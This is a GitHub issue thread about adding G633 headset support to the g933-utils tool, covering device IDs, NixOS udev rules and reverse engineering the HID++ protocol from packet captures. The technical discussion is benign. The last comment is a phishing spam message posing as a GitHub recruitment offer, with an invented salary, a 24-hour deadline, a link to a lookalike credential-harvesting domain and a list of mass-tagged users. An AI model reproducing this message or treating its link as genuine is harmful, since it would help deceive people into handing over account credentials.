### ISSUE TITLE
Support for G633

### ISSUE THREAD

**Issue by dali99** [ashkitten/g933-utils#14]
Does this program work with the G933's little brother, the G633?

If not do you know how difficult it would be to add? Or maybe you have some general pointers and gotchas?

**Comment by ashkitten** [comment]
i don't own a g633, but someone added g533 support in the past [here](https://github.com/ashkitten/g933-utils/pull/6) so if it uses the same protocol there should be no issue, just add the usb device id in the same way as that did.

this headset has no battery, correct? that's the main issue i could see with it. let me know if you have problems, i can try to work out a proper fix.

**Comment by dali99** [comment]
yep that's right, seems there is a feature thing for batteries so maybe very little changes are needed.

What would be the recommended way to use this on nixos? Can't exactly place the udev rule in /etc/ unless I package it I guess

**Comment by ashkitten** [comment]
i'm currently using this on nixos. you can copy the derivation from [here](https://github.com/ashkitten/nixos-config/blob/master/home-manager/packages/g933-utils/default.nix). you may have to change the `cargoSha256` depending on your nixpkgs version.

i set up udev rules [here](https://github.com/ashkitten/nixos-config/blob/master/desktop.nix#L107-L109), not actually the same as the 90-logitech.rules in this project (maybe i should change that, it seems a little much to have a logitech group when i doubt it's useful to most people)

**Comment by dali99** [comment]
adding
```
DeviceMatch {
        pid: 0x0a5c,
        name: "G633 Headset",
    },
```

to `SUPPORTED_DEVICES` just kinda, worked. At least for `sidetone_volume`, `buttons` and the equalizers stuff.

getting `battery` and `poweroff_timeout` hangs the program though

watching for buttons events doesn't seem to be working at all

**Comment by ashkitten** [comment]
`watch buttons` might require you to run `set buttons true` first

if `get battery` and `get poweroff_timeout` hang, it probably means that the headset does not support those features, which makes sense as it does not have a battery and thus does not need to power off automatically. i haven't worked on this for a while, but there might be a way to query the device for its featureset. i'll have to look into that.

**Comment by dali99** [comment]
yeah buttons had to be set true even though getting buttons earlier said Enabled

**Comment by dali99** [comment]
do you just reverse engineer the proprietary userspace stuff? or is the protocol documented somewhere? I want to try tweak the Automatic Gain Control for my microphone

**Comment by ashkitten** [comment]
i reverse engineered the protocol based on wireshark logs of a windows virtual machine running logitech gaming software. i've got a bunch of packet captures in the `notes` directory, and `notes/notes.txt` is where i put down observations about what various packets do. i also wrote a wireshark lua script to parse hid++, instructions to load the script are in the README.

**Comment by sweeper02** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
avalla, @ammarasmro, @nepaul, @syed-shahjahan, @igorGevaerd, @dweidenfeld, @AH-Ahsan-habib, @diegoarcega, @anoff, @chenenpei, @sdeancos, @fxlv, @jacobpclouse, @fightudy, @subinkrishna, @prateekpandey14, @raulricardo, @TasinNference, @GowthamPB, @hawtim
